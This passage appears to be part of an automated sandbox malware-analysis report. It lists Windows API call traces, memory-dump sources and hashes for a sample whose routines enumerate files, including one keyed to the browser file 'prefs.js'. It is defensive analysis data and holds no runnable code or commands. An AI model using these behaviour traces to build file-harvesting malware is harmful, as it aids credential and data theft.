                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s$%s\%s$%s\*
                                            • API String ID: 180737720-445461498
                                            • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                            • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                            • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                            • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 03033B33
                                            • FindFirstFileA.KERNEL32(?,?), ref: 03033B4A
                                            • lstrcat.KERNEL32(?,?), ref: 03033B9C
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 03033BAE
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 03033BC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 03033ECE
                                            • FindClose.KERNEL32(000000FF), ref: 03033EE3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 1125553467-0
                                            • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                            • Instruction ID: 24c4f74d750853d89decfb3d1a242ec66c99f304600373de7b8378726af5297e
                                            • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                            • Instruction Fuzzy Hash: F5A141B9A41218ABDB34DFA4DD84FEE73BDBB86300F0445C9A60D96180DB759B84CF52
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                            • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                            • wsprintfA.USER32 ref: 004145A6
                                            • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                            • FindClose.KERNEL32(000000FF), ref: 004146A0
                                            • lstrcatA.KERNEL32(?,02E26360,?,00000104), ref: 004146C5
                                            • lstrcatA.KERNEL32(?,02E29898), ref: 004146D8
                                            • lstrlenA.KERNEL32(?), ref: 004146E5
                                            • lstrlenA.KERNEL32(?), ref: 004146F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                            • String ID: %s\%s$%s\*
                                            • API String ID: 13328894-2848263008
                                            • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                            • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                            • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                            • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                            APIs
                                            • wsprintfA.USER32 ref: 03034B93
                                            • FindFirstFileA.KERNEL32(?,?), ref: 03034BAA
                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 03034BD8
                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 03034BEE
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 03034DE4
                                            • FindClose.KERNEL32(000000FF), ref: 03034DF9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                            • Instruction ID: 23cc26ef7b517e4c6de5100e7809989714b9264fe2586612e7f4276dc60eb9e5
                                            • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                            • Instruction Fuzzy Hash: FF6166B6940218BBCB24EBE0DD48FEA77BDFB4A700F04458DA60996140EB75A785CF91
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0302C15C
                                            • StrCmpCA.SHLWAPI(?,004213F8), ref: 0302C1B4
                                            • StrCmpCA.SHLWAPI(?,004213FC), ref: 0302C1CA
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302CA26
                                            • FindClose.KERNEL32(000000FF), ref: 0302CA38
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                            • Instruction ID: f86dbc44d06744f495df9b0e362f2c21d3cb04f1899753c7012fc76523d03a44
                                            • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                            • Instruction Fuzzy Hash: 9242727AA11354ABCB18FBA0DD95EEE737DAFD6300F404158A54AAB090EF349B48CF51
                                            APIs
                                            • wsprintfA.USER32 ref: 00413EC3
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                            • FindClose.KERNEL32(000000FF), ref: 00414081
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 180737720-4073750446
                                            • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                            • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                            • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                            • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 030347E7
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 030347EE
                                            • wsprintfA.USER32 ref: 0303480D
                                            • FindFirstFileA.KERNEL32(?,?), ref: 03034824
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 03034852
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 03034868
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 030348F2
                                            • FindClose.KERNEL32(000000FF), ref: 03034907
                                            • lstrcat.KERNEL32(?,0064A524), ref: 0303492C
                                            • lstrcat.KERNEL32(?,0064A22C), ref: 0303493F
                                            • lstrlen.KERNEL32(?), ref: 0303494C
                                            • lstrlen.KERNEL32(?), ref: 0303495D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                            • String ID:
                                            • API String ID: 671575355-0
                                            • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                            • Instruction ID: 18bd4a95b39c40415cc8539860481178ffcbda8d1f964b51989871260f0cc925
                                            • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                            • Instruction Fuzzy Hash: F451A5B9980218ABCB24EBB0DC88FEE777DEB59300F4045C8F64996190DB749B84CF91
                                            APIs
                                            • wsprintfA.USER32 ref: 0303412A
                                            • FindFirstFileA.KERNEL32(?,?), ref: 03034141
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0303416F
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 03034185
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 030342D3
                                            • FindClose.KERNEL32(000000FF), ref: 030342E8
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                            • Instruction ID: 9805c560554357abe9d8cd61ff1c6bea44dbbfef2ae2d6d5c566dea57dc98fb9
                                            • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                            • Instruction Fuzzy Hash: D55184BA900218BBCB24FBF0DC84EEA737DBB85300F4485C9B64996040DB75DB898F95
                                            APIs
                                            • wsprintfA.USER32 ref: 0040ED3E
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                            • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\*.*
                                            • API String ID: 180737720-1013718255
                                            • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                            • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                            • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                            • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                            • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID: 4@$\*.*
                                            • API String ID: 2325840235-1993203227
                                            • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                            • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                            • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                            • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                            • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: prefs.js
                                            • API String ID: 3334442632-3783873740
                                            • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                            • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                            • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                            • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                            • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                            • FindClose.KERNEL32(000000FF), ref: 00401E32
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 1415058207-1173974218
                                            • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                            • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                            • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                            • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                            APIs
                                            • wsprintfA.USER32 ref: 0302EFA5
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0302EFBC
                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 0302F012
                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 0302F028
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302F515
                                            • FindClose.KERNEL32(000000FF), ref: 0302F52A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                            • Instruction ID: a5998cddd4194e29f710c50b84530dc5d9a44bf01f12f7367a205fa121ba6fa4
                                            • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                            • Instruction Fuzzy Hash: 68E11F76A127689BDB58FB60DD90EEE733DAF96200F4441D9B04A66091EF306F89CF50
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                            • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                            • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                            • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                            • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0302DD52
                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 0302DD9A
                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 0302DDB0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302E033
                                            • FindClose.KERNEL32(000000FF), ref: 0302E045
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                            • Instruction ID: 7c460f1240794b692462e4a3f95cb3b715f6b1771dc5a7b8102ddece5bf3c456
                                            • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                            • Instruction Fuzzy Hash: BA91A27BA017549BCB14FBB0DD559EE777DAFC7301F004668A48A9A150EF349B088B91
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0302F985
                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 0302F9D6
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0302F9EC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302FD18
                                            • FindClose.KERNEL32(000000FF), ref: 0302FD2A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
